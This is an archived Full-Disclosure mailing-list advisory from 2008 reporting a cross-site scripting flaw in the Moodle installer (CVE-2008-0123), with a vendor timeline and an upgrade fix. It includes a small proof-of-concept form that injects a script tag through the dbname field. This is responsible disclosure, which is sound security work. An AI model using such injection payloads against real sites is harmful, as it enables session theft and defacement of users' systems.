Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
From: Hanno Böck (mlhboeck.de)
Date: Fri Jan 11 2008 - 17:51:55 CST
Source URL of this announcement:
Moodle is a course management system for educators.
The installer code is vulnerable to Cross Site Scripting, letting you inject
installed moodle, so this can be considered low impact. Still it's possible
to attack if an attacker knows from another person installing moodle.
Sample XSS code:
<form method="post" action="http://localhost/moodle/install.php">
<input type="hidden" name="stage" value="3">
<input type="text" name="dbname" value='"><script>alert(1)</script>'>
Update to 1.8.4.
2007-01-08 Vendor contacted
2007-01-08 Vendor fixed cvs
2007-01-11 Vendor released 1.8.4
The Common Vulnerabilities and Exposures (CVE) project has assigned the name
CVE-2008-0123 to this issue. This is a candidate for inclusion in the CVE
list (http://cve.mitre.org/), which standardizes names for security problems.
Credits and copyright
This vulnerability was discovered by Hanno Boeck of schokokeks.org webhosting.
It's licensed under the creative commons attribution license.
Hanno Boeck, 2008-01-12, http://www.hboeck.de
Hanno Böck Blog: http://www.hboeck.de/
GPG: 3DBD3B20 Jabber/Mail: hannohboeck.de
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
-----END PGP SIGNATURE-----
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/